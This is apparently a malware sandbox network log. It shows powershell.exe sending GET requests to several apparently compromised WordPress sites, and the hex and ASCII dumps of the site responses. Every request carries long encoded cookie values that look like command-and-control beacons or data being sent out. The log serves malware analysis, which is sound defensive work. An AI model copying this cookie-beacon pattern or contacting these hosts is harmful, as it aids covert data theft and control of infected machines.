                                                    2024-12-18 10:17:30 UTC8000INData Raw: 6d 67 20 64 65 63 6f 64 69 6e 67 3d 22 61 73 79 6e 63 22 20 77 69 64 74 68 3d 22 33 30 30 22 20 68 65 69 67 68 74 3d 22 33 30 30 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 61 65 65 64 6d 64 63 61 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 31 2f 31 32 2f 53 54 45 50 2d 32 30 32 31 2d 33 30 30 78 33 30 30 2e 6a 70 65 67 22 20 63 6c 61 73 73 3d 22 61 74 74 61 63 68 6d 65 6e 74 2d 6d 65 64 69 75 6d 20 73 69 7a 65 2d 6d 65 64 69 75 6d 20 77 70 2d 69 6d 61 67 65 2d 31 33 35 37 22 20 61 6c 74 3d 22 22 20 73 72 63 73 65 74 3d 22 68 74 74 70 73 3a 2f 2f 73 61 65 65 64 6d 64 63 61 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 31 2f 31 32 2f 53 54 45 50 2d 32 30 32 31 2d 33 30 30 78
                                                    Data Ascii: mg decoding="async" width="300" height="300" src="https://saeedmdcat.com/wp-content/uploads/2021/12/STEP-2021-300x300.jpeg" class="attachment-medium size-medium wp-image-1357" alt="" srcset="https://saeedmdcat.com/wp-content/uploads/2021/12/STEP-2021-300x
                                                    2024-12-18 10:17:30 UTC8000INData Raw: 74 69 6f 6e 28 74 29 7b 74 68 69 73 2e 74 72 69 67 67 65 72 45 76 65 6e 74 73 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 65 2c 74 2e 75 73 65 72 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 2c 74 2e 6f 70 74 69 6f 6e 73 29 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 5f 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 68 69 73 2e 74 72 69 67 67 65 72 45 76 65 6e 74 73 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 65 2c 74 2e 75 73 65 72 45 76 65 6e 74 4c 69 73 74 65 6e 65 72
                                                    Data Ascii: tion(t){this.triggerEvents.forEach(function(e){return window.addEventListener(e,t.userEventListener,t.options)})}},{key:"_removeEventListener",value:function(t){this.triggerEvents.forEach(function(e){return window.removeEventListener(e,t.userEventListener
                                                    2024-12-18 10:17:30 UTC1941INData Raw: 3a 7b 22 70 61 67 65 22 3a 5b 5d 2c 22 65 64 69 74 6f 72 50 72 65 66 65 72 65 6e 63 65 73 22 3a 5b 5d 7d 2c 22 6b 69 74 22 3a 7b 22 61 63 74 69 76 65 5f 62 72 65 61 6b 70 6f 69 6e 74 73 22 3a 5b 22 76 69 65 77 70 6f 72 74 5f 6d 6f 62 69 6c 65 22 2c 22 76 69 65 77 70 6f 72 74 5f 74 61 62 6c 65 74 22 5d 2c 22 67 6c 6f 62 61 6c 5f 69 6d 61 67 65 5f 6c 69 67 68 74 62 6f 78 22 3a 22 79 65 73 22 2c 22 6c 69 67 68 74 62 6f 78 5f 65 6e 61 62 6c 65 5f 63 6f 75 6e 74 65 72 22 3a 22 79 65 73 22 2c 22 6c 69 67 68 74 62 6f 78 5f 65 6e 61 62 6c 65 5f 66 75 6c 6c 73 63 72 65 65 6e 22 3a 22 79 65 73 22 2c 22 6c 69 67 68 74 62 6f 78 5f 65 6e 61 62 6c 65 5f 7a 6f 6f 6d 22 3a 22 79 65 73 22 2c 22 6c 69 67 68 74 62 6f 78 5f 65 6e 61 62 6c 65 5f 73 68 61 72 65 22 3a 22 79 65
                                                    Data Ascii: :{"page":[],"editorPreferences":[]},"kit":{"active_breakpoints":["viewport_mobile","viewport_tablet"],"global_image_lightbox":"yes","lightbox_enable_counter":"yes","lightbox_enable_fullscreen":"yes","lightbox_enable_zoom":"yes","lightbox_enable_share":"ye


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.11.2049716129.232.136.1704438988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-18 10:17:42 UTC2269OUTGET / HTTP/1.1
                                                    Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVRTW+DMAz9K+MP9DTt3mVs5VAVNe0q9TKhYMBrvhQHChI/fk7pusOUQ/z8/PJsp+prdHU7Z8rZzlHkgAIRX7Exzs5ZrfWSr69mzmD02gUIc9Y4G+swLFxRa5gzbJtRHAsJYUB1x/mWWRtBC795E6Uc1B8GhTf83eEX/Yo0Vcl+C8aF6Uk44wMQYWpl1zRcIjSqy8Ht+5SxsPZ+VXwIsTqhfTh7d4VAHWg9ZyX [TRUNCATED]
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                    Host: wickandjuice.co.za
                                                    Connection: Close
                                                    2024-12-18 10:17:44 UTC422INHTTP/1.1 200 OK
                                                    Date: Wed, 18 Dec 2024 10:17:42 GMT
                                                    Server: Apache
                                                    Link: <https://wickandjuice.co.za/wp-json/>; rel="https://api.w.org/", <https://wickandjuice.co.za/wp-json/wp/v2/pages/2139>; rel="alternate"; type="application/json", <https://wickandjuice.co.za/>; rel=shortlink
                                                    Upgrade: h2,h2c
                                                    Connection: Upgrade, close
                                                    Vary: Accept-Encoding
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=UTF-8
                                                    2024-12-18 10:17:44 UTC7770INData Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 5a 41 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74
                                                    Data Ascii: 2000<!DOCTYPE html><html lang="en-ZA" prefix="og: https://ogp.me/ns#"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><link rel="pingback" href="htt
                                                    2024-12-18 10:17:44 UTC428INData Raw: 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29 2c 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52 4c 2e 63 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 28 72 29 2c 7b 6e 61 6d 65 3a 22 77 70 54 65 73 74 45 6d 6f 6a 69 53 75 70 70 6f 72 74 73 22 7d 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 28 61 2e 6f 6e 6d 65 73 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 20 69 6e 20 65 29 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74
                                                    Data Ascii: :"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everyt
                                                    2024-12-18 10:17:44 UTC2INData Raw: 0d 0a
                                                    Data Ascii:
                                                    2024-12-18 10:17:44 UTC8192INData Raw: 32 30 30 30 0d 0a 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 7c 7c 28 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 2c 28 65 3d 6e 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26
                                                    Data Ascii: 2000orts.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&
                                                    2024-12-18 10:17:44 UTC6INData Raw: 78 20 72 67 62 61
                                                    Data Ascii: x rgba
                                                    2024-12-18 10:17:44 UTC2INData Raw: 0d 0a
                                                    Data Ascii:
                                                    2024-12-18 10:17:44 UTC8192INData Raw: 32 30 30 30 0d 0a 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 7d 3a 77 68 65 72 65 28 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 30 2e 35 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 30 2e 35 65 6d 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 6f 77 20 3e 20 2e 61 6c 69 67 6e 6c 65 66 74 7b 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 30 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 32 65 6d 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 6f 77 20 3e 20 2e 61 6c 69 67 6e 72 69 67 68 74 7b 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 32
                                                    Data Ascii: 2000(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-flow > .alignright{float: right;margin-inline-start: 2
                                                    2024-12-18 10:17:44 UTC6INData Raw: 3d 27 65 6c 65 63
                                                    Data Ascii: ='elec
                                                    2024-12-18 10:17:44 UTC2INData Raw: 0d 0a
                                                    Data Ascii:
                                                    2024-12-18 10:17:44 UTC8192INData Raw: 32 30 30 30 0d 0a 74 72 6f 2d 73 74 79 6c 65 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 69 63 6b 61 6e 64 6a 75 69 63 65 2e 63 6f 2e 7a 61 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 65 6c 65 63 74 72 6f 2f 73 74 79 6c 65 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 33 2e 30 2e 33 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 79 69 74 68 5f 79 77 72 61 71 5f 66 72 6f 6e 74 65 6e 64 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 69 63 6b 61 6e 64 6a 75 69 63 65 2e 63 6f 2e 7a 61 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 79 69 74 68 2d 77 6f 6f 63 6f 6d 6d 65 72 63
                                                    Data Ascii: 2000tro-style-css' href='https://wickandjuice.co.za/wp-content/themes/electro/style.min.css?ver=3.0.3' type='text/css' media='all' /><link rel='stylesheet' id='yith_ywraq_frontend-css' href='https://wickandjuice.co.za/wp-content/plugins/yith-woocommerc


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.11.204971766.198.240.434431972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-18 10:17:51 UTC2261OUTGET / HTTP/1.1
                                                    Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVRTW+DMAz9K+MP9DTt3mVs5VAVNe0q9TKhYMBrvhQHChI/fk7pusOUQ/z8/PJsp+prdHU7Z8rZzlHkgAIRX7Exzs5ZrfWSr69mzmD02gUIc9Y4G+swLFxRa5gzbJtRHAsJYUB1x/mWWRtBC795E6Uc1B8GhTf83eEX/Yo0Vcl+C8aF6Uk44wMQYWpl1zRcIjSqy8Ht+5SxsPZ+VXwIsTqhfTh7d4VAHWg9ZyX [TRUNCATED]
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                    Host: werrrk.com
                                                    Connection: Close
                                                    2024-12-18 10:17:51 UTC255INHTTP/1.1 200 OK
                                                    Date: Wed, 18 Dec 2024 10:17:51 GMT
                                                    Content-Length: 11752
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    cf-edge-cache: no-cache
                                                    Server: imunify360-webshield/1.21
                                                    2024-12-18 10:17:51 UTC11752INData Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 0a 2e 73 70 69 6e 6e 65 72 20 7b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf8"> <meta name="viewport" content="width=device-width,initial-scale=1.0"> <link rel="icon" href="data:,"> <title>One moment, please...</title> <style> .spinner { -webkit-animati


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.11.204971867.205.27.2494438988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-18 10:18:06 UTC2279OUTGET /wordpress/ HTTP/1.1
                                                    Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVRTW+DMAz9K+MP9DTt3mVs5VAVNe0q9TKhYMBrvhQHChI/fk7pusOUQ/z8/PJsp+prdHU7Z8rZzlHkgAIRX7Exzs5ZrfWSr69mzmD02gUIc9Y4G+swLFxRa5gzbJtRHAsJYUB1x/mWWRtBC795E6Uc1B8GhTf83eEX/Yo0Vcl+C8aF6Uk44wMQYWpl1zRcIjSqy8Ht+5SxsPZ+VXwIsTqhfTh7d4VAHWg9ZyX [TRUNCATED]
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                    Host: www.anifowoshe.com
                                                    Connection: Close
                                                    2024-12-18 10:18:08 UTC328INHTTP/1.1 500 Internal Server Error
                                                    Date: Wed, 18 Dec 2024 10:18:07 GMT
                                                    Server: Apache
                                                    Vary: Accept-Encoding,Cookie,User-Agent
                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                    Upgrade: h2
                                                    Connection: Upgrade, close
                                                    Content-Length: 2743
                                                    Content-Type: text/html; charset=UTF-8
                                                    2024-12-18 10:18:08 UTC2743INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 57 6f 72 64
                                                    Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><meta name='robots' content='max-image-preview:large, noindex, follow' /><title>Word


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.11.204971988.218.116.1374431972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-18 10:18:12 UTC2270OUTGET / HTTP/1.1
                                                    Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVRy26DMBD8lfIDOVW9E4c2HKKgkDRSLhUyC2zjl7yGgMTHdx3S9FD54JmdHe/DVV+jrds5kdZ0lgID8kR8hUZbMye1Uku8vuk5gdEp68HPSWNNqP2waHmtYE6wbUZxykvwA8oHz3asmgBKuO1GFOUg/zhIvPPvDr/o16SoiuV3oK2fXoTVzgMRxlb2TcMpQqG8Hu2hjxEDqXOr/EOI1RnNs7KzN/DUgVJzUrA [TRUNCATED]
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                    Host: pensuni.com
                                                    Connection: Close
                                                    2024-12-18 10:18:13 UTC326INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Wed, 18 Dec 2024 10:18:13 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    Vary: Accept-Encoding
                                                    X-Cached-With: ezCache
                                                    Vary: Accept-Encoding, Cookie
                                                    Last-Modified: Wed, 18 Dec 2024 08:31:46 GMT
                                                    X-Proxy-Cache: MISS
                                                    2024-12-18 10:18:13 UTC16058INData Raw: 37 65 65 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 20 3c 68 74 6d 6c 20 64 69 72 3d 22 72 74 6c 22 20 6c 61 6e 67 3d 22 68 65 2d 49 4c 22 20 64 61 74 61 2d 73 6b 69 6e 3d 22 6c 69 67 68 74 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 20 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 2f 3e 20 3c 73 74 79 6c 65 20 69 64 3d 22 6a 65 74 70 61 63 6b 2d 62 6f 6f 73 74 2d 63 72 69 74 69 63 61 6c 2d 63 73 73 22 3e 40 6d 65 64 69 61 20 61 6c 6c 7b 62 6f 64 79 20 2e 61 63 63 65 73 73 61 62 69 6c 69 74 79 5f 63 6f 6e 74 61
                                                    Data Ascii: 7ee6<!DOCTYPE html> <html dir="rtl" lang="he-IL" data-skin="light" prefix="og: https://ogp.me/ns#"> <head> <meta charset="UTF-8"/> <link rel="profile" href="//gmpg.org/xfn/11"/> <style id="jetpack-boost-critical-css">@media all{body .accessability_conta
